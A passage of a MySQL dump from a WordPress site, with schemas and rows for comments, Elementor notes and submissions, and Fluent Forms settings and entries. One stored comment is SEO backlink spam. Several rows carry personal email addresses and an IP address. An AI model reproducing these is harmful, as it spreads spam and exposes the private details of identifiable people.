KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10)),
KEY `woo_idx_comment_type` (`comment_type`)
) ENGINE=InnoDB AUTO_INCREMENT=230 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES
(229,583,'Bart Mock','bart.mock@msn.com','','156.239.199.153','2026-02-10 14:52:52','2026-02-10 14:52:52','Best seo services to supercharge your website backlinks \r\nBonusBacklinks.com - we build daily backlinks and drive organic traffic to your website EVERY DAY: \r\n\r\nUse 85% SALE \r\nQuality daily seo backlinks \r\nOrganic website visits \r\nPrices only from $1 \r\nBonus coupon codes: \r\n\r\nhttps://BonusBacklinks.com/85Discount\r\n\r\nBonusBacklinks.com - daily backlinks and organic clicks to improve your site everyday',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_events`
--
DROP TABLE IF EXISTS `wp_e_events`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_events` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`event_data` text DEFAULT NULL,
`created_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_events`
--
LOCK TABLES `wp_e_events` WRITE;
/*!40000 ALTER TABLE `wp_e_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_events` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_notes`
--
DROP TABLE IF EXISTS `wp_e_notes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_notes` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`route_url` text DEFAULT NULL COMMENT 'Clean url where the note was created.',
`route_title` varchar(255) DEFAULT NULL,
`route_post_id` bigint(20) unsigned DEFAULT NULL COMMENT 'The post id of the route that the note was created on.',
`post_id` bigint(20) unsigned DEFAULT NULL,
`element_id` varchar(60) DEFAULT NULL COMMENT 'The Elementor element ID the note is attached to.',
`parent_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`author_id` bigint(20) unsigned DEFAULT NULL,
`author_display_name` varchar(250) DEFAULT NULL COMMENT 'Save the author name when the author was deleted.',
`status` varchar(20) NOT NULL DEFAULT 'publish',
`position` text DEFAULT NULL COMMENT 'A JSON string that represents the position of the note inside the element in percentages. e.g. {x:10, y:15}',
`content` longtext DEFAULT NULL,
`is_resolved` tinyint(1) NOT NULL DEFAULT 0,
`is_public` tinyint(1) NOT NULL DEFAULT 1,
`last_activity_at` datetime DEFAULT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `route_url_index` (`route_url`(191)),
KEY `post_id_index` (`post_id`),
KEY `element_id_index` (`element_id`),
KEY `parent_id_index` (`parent_id`),
KEY `author_id_index` (`author_id`),
KEY `status_index` (`status`),
KEY `is_resolved_index` (`is_resolved`),
KEY `is_public_index` (`is_public`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`),
KEY `last_activity_at_index` (`last_activity_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_notes`
--
LOCK TABLES `wp_e_notes` WRITE;
/*!40000 ALTER TABLE `wp_e_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_notes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_notes_users_relations`
--
DROP TABLE IF EXISTS `wp_e_notes_users_relations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_notes_users_relations` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(60) NOT NULL COMMENT 'The relation type between user and note (e.g mention, watch, read).',
`note_id` bigint(20) unsigned NOT NULL,
`user_id` bigint(20) unsigned NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `type_index` (`type`),
KEY `note_id_index` (`note_id`),
KEY `user_id_index` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_notes_users_relations`
--
LOCK TABLES `wp_e_notes_users_relations` WRITE;
/*!40000 ALTER TABLE `wp_e_notes_users_relations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_notes_users_relations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_submissions`
--
DROP TABLE IF EXISTS `wp_e_submissions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_submissions` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(60) DEFAULT NULL,
`hash_id` varchar(60) NOT NULL,
`main_meta_id` bigint(20) unsigned NOT NULL COMMENT 'Id of main field. to represent the main meta field',
`post_id` bigint(20) unsigned NOT NULL,
`referer` varchar(500) NOT NULL,
`referer_title` varchar(300) DEFAULT NULL,
`element_id` varchar(20) NOT NULL,
`form_name` varchar(60) NOT NULL,
`campaign_id` bigint(20) unsigned NOT NULL,
`user_id` bigint(20) unsigned DEFAULT NULL,
`user_ip` varchar(46) NOT NULL,
`user_agent` text NOT NULL,
`actions_count` int(11) DEFAULT 0,
`actions_succeeded_count` int(11) DEFAULT 0,
`status` varchar(20) NOT NULL,
`is_read` tinyint(1) NOT NULL DEFAULT 0,
`meta` text DEFAULT NULL,
`created_at_gmt` datetime NOT NULL,
`updated_at_gmt` datetime NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `hash_id_unique_index` (`hash_id`),
KEY `main_meta_id_index` (`main_meta_id`),
KEY `hash_id_index` (`hash_id`),
KEY `type_index` (`type`),
KEY `post_id_index` (`post_id`),
KEY `element_id_index` (`element_id`),
KEY `campaign_id_index` (`campaign_id`),
KEY `user_id_index` (`user_id`),
KEY `user_ip_index` (`user_ip`),
KEY `status_index` (`status`),
KEY `is_read_index` (`is_read`),
KEY `created_at_gmt_index` (`created_at_gmt`),
KEY `updated_at_gmt_index` (`updated_at_gmt`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`),
KEY `referer_index` (`referer`(191)),
KEY `referer_title_index` (`referer_title`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_submissions`
--
LOCK TABLES `wp_e_submissions` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_submissions_actions_log`
--
DROP TABLE IF EXISTS `wp_e_submissions_actions_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_submissions_actions_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`submission_id` bigint(20) unsigned NOT NULL,
`action_name` varchar(60) NOT NULL,
`action_label` varchar(60) DEFAULT NULL,
`status` varchar(20) NOT NULL,
`log` text DEFAULT NULL,
`created_at_gmt` datetime NOT NULL,
`updated_at_gmt` datetime NOT NULL,
`created_at` datetime NOT NULL,
`updated_at` datetime NOT NULL,
PRIMARY KEY (`id`),
KEY `submission_id_index` (`submission_id`),
KEY `action_name_index` (`action_name`),
KEY `status_index` (`status`),
KEY `created_at_gmt_index` (`created_at_gmt`),
KEY `updated_at_gmt_index` (`updated_at_gmt`),
KEY `created_at_index` (`created_at`),
KEY `updated_at_index` (`updated_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_submissions_actions_log`
--
LOCK TABLES `wp_e_submissions_actions_log` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions_actions_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions_actions_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_e_submissions_values`
--
DROP TABLE IF EXISTS `wp_e_submissions_values`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_submissions_values` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`submission_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`key` varchar(60) DEFAULT NULL,
`value` longtext DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `submission_id_index` (`submission_id`),
KEY `key_index` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_e_submissions_values`
--
LOCK TABLES `wp_e_submissions_values` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions_values` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_ff_scheduled_actions`
--
DROP TABLE IF EXISTS `wp_ff_scheduled_actions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_ff_scheduled_actions` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`action` varchar(255) DEFAULT NULL,
`form_id` bigint(20) unsigned DEFAULT NULL,
`origin_id` bigint(20) unsigned DEFAULT NULL,
`feed_id` bigint(20) unsigned DEFAULT NULL,
`type` varchar(255) DEFAULT 'submission_action',
`status` varchar(255) DEFAULT NULL,
`data` longtext DEFAULT NULL,
`note` tinytext DEFAULT NULL,
`retry_count` int(10) unsigned DEFAULT 0,
`created_at` timestamp NULL DEFAULT NULL,
`updated_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_ff_scheduled_actions`
--
LOCK TABLES `wp_ff_scheduled_actions` WRITE;
/*!40000 ALTER TABLE `wp_ff_scheduled_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_ff_scheduled_actions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_entry_details`
--
DROP TABLE IF EXISTS `wp_fluentform_entry_details`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_entry_details` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`form_id` bigint(20) unsigned DEFAULT NULL,
`submission_id` bigint(20) unsigned DEFAULT NULL,
`field_name` varchar(255) DEFAULT NULL,
`sub_field_name` varchar(255) DEFAULT NULL,
`field_value` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_entry_details`
--
LOCK TABLES `wp_fluentform_entry_details` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_entry_details` DISABLE KEYS */;
INSERT INTO `wp_fluentform_entry_details` VALUES
(1,3,1,'names','first_name','m'),
(2,3,1,'email','','masoud.nikoofar@gmail.com'),
(3,3,1,'checkbox','0','Hocky'),
(4,3,1,'input_radio_1','','Afternoon'),
(5,3,1,'description','','kkkkkk');
/*!40000 ALTER TABLE `wp_fluentform_entry_details` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_form_analytics`
--
DROP TABLE IF EXISTS `wp_fluentform_form_analytics`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_form_analytics` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`form_id` int(10) unsigned DEFAULT NULL,
`user_id` int(10) unsigned DEFAULT NULL,
`source_url` varchar(255) NOT NULL,
`platform` char(30) DEFAULT NULL,
`browser` char(30) DEFAULT NULL,
`city` varchar(100) DEFAULT NULL,
`country` varchar(100) DEFAULT NULL,
`ip` char(15) DEFAULT NULL,
`count` int(11) DEFAULT 1,
`created_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_form_analytics`
--
LOCK TABLES `wp_fluentform_form_analytics` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_form_analytics` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_fluentform_form_analytics` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_form_meta`
--
DROP TABLE IF EXISTS `wp_fluentform_form_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_form_meta` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`form_id` int(10) unsigned DEFAULT NULL,
`meta_key` varchar(255) NOT NULL,
`value` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_form_meta`
--
LOCK TABLES `wp_fluentform_form_meta` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_form_meta` DISABLE KEYS */;
INSERT INTO `wp_fluentform_form_meta` VALUES
(1,1,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"],\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\",\"appendSurveyResult\":{\"enabled\":false,\"showLabel\":false,\"showCount\":false}}'),
(2,1,'advancedValidationSettings','{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":\"\",\"operator\":\"=\",\"value\":\"\"}],\"error_message\":\"\",\"validation_type\":\"fail_on_condition_met\"}'),
(3,1,'double_optin_settings','{\"status\":\"no\",\"confirmation_message\":\"Please check your email inbox to confirm this submission\",\"email_body_type\":\"global\",\"email_subject\":\"Please confirm your form submission\",\"email_body\":\"<h2>Please Confirm Your Submission</h2><p> </p><p style=\"text-align: center;\"><a style=\"color: #ffffff; background-color: #454545; font-size: 16px; border-radius: 5px; text-decoration: none; font-weight: normal; font-style: normal; padding: 0.8rem 1rem; border-color: #0072ff;\" href=\"#confirmation_url#\">Confirm Submission</a></p><p> </p><p>If you received this email by mistake, simply delete it. Your form submission won\'t proceed if you don\'t click the confirmation link above.</p>\",\"email_field\":\"\",\"skip_if_logged_in\":\"yes\",\"skip_if_fc_subscribed\":\"no\"}'),
(4,2,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"asteriskPlacement\":\"asterisk-right\"}}'),
(5,2,'notifications','{\"name\":\"Admin Notification Email\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":\"email\",\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"[{inputs.names}] New Form Submission\",\"message\":\"<p>{all_data}<\\/p> <p>This form submitted at: {embed_post.permalink}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}'),
(6,2,'step_data_persistency_status','no'),
(7,2,'_primary_email_field','email'),
(8,3,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\"}}'),
(9,3,'notifications','{\"name\":\"Polling Form Notification\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":null,\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"Polling Form\",\"message\":\"<p>{all_data}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}');
/*!40000 ALTER TABLE `wp_fluentform_form_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_forms`
--
DROP TABLE IF EXISTS `wp_fluentform_forms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_forms` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`status` varchar(45) DEFAULT 'Draft',
`appearance_settings` text DEFAULT NULL,
`form_fields` longtext DEFAULT NULL,
`has_payment` tinyint(1) NOT NULL DEFAULT 0,
`type` varchar(45) DEFAULT NULL,
`conditions` text DEFAULT NULL,
`created_by` int(11) DEFAULT NULL,
`created_at` timestamp NULL DEFAULT NULL,
`updated_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_forms`
--
LOCK TABLES `wp_fluentform_forms` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_forms` DISABLE KEYS */;
INSERT INTO `wp_fluentform_forms` VALUES
(1,'Contact Form Demo','published',NULL,'{\"fields\":[{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Name\",\"conditional_logics\":[]},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"First Name\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Last Name\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"ff-edit-name\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1570866006692\"},{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1570866012914\"},{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Subject\"},\"settings\":{\"container_class\":\"\",\"label\":\"Subject\",\"label_placement\":\"\",\"admin_field_label\":\"Subject\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1570878958648\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"message\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Message\",\"rows\":4,\"cols\":2},\"settings\":{\"container_class\":\"\",\"label\":\"Your Message\",\"admin_field_label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1570879001207\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#409EFF\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'',NULL,2,'2021-07-05 13:59:06','2021-07-05 13:59:06'),
(2,'Subscription Form','published',NULL,'{\"fields\":[{\"index\":1,\"element\":\"container\",\"attributes\":[],\"settings\":{\"container_class\":\"\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"columns\":[{\"fields\":[{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"Email\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\"},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16231279686950.8779857923682932\"}]},{\"fields\":[{\"index\":15,\"element\":\"custom_submit_button\",\"attributes\":{\"class\":\"\",\"type\":\"submit\"},\"settings\":{\"button_style\":\"\",\"button_size\":\"md\",\"align\":\"left\",\"container_class\":\"\",\"current_state\":\"normal_styles\",\"background_color\":\"\",\"color\":\"\",\"hover_styles\":{\"backgroundColor\":\"#ffffff\",\"borderColor\":\"#409EFF\",\"color\":\"#409EFF\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"normal_styles\":{\"backgroundColor\":\"#409EFF\",\"borderColor\":\"#409EFF\",\"color\":\"#ffffff\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"button_ui\":{\"text\":\"Subscribe\",\"type\":\"default\",\"img_url\":\"\"},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Custom Submit Button\",\"icon_class\":\"dashicons dashicons-arrow-right-alt\",\"template\":\"customButton\"},\"uniqElKey\":\"el_16231279798380.5947400167493171\"}]}],\"editor_options\":{\"title\":\"Two Column Container\",\"icon_class\":\"ff-edit-column-2\"},\"uniqElKey\":\"el_16231279284710.40955091024524304\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#409EFF\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Subscribe\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,2,'2021-07-05 13:59:06','2021-07-05 13:59:06'),
(3,'Polling Form (#3)','published',NULL,'{\"fields\":[{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Full Name\",\"conditional_logics\":[]},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Full Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Middle 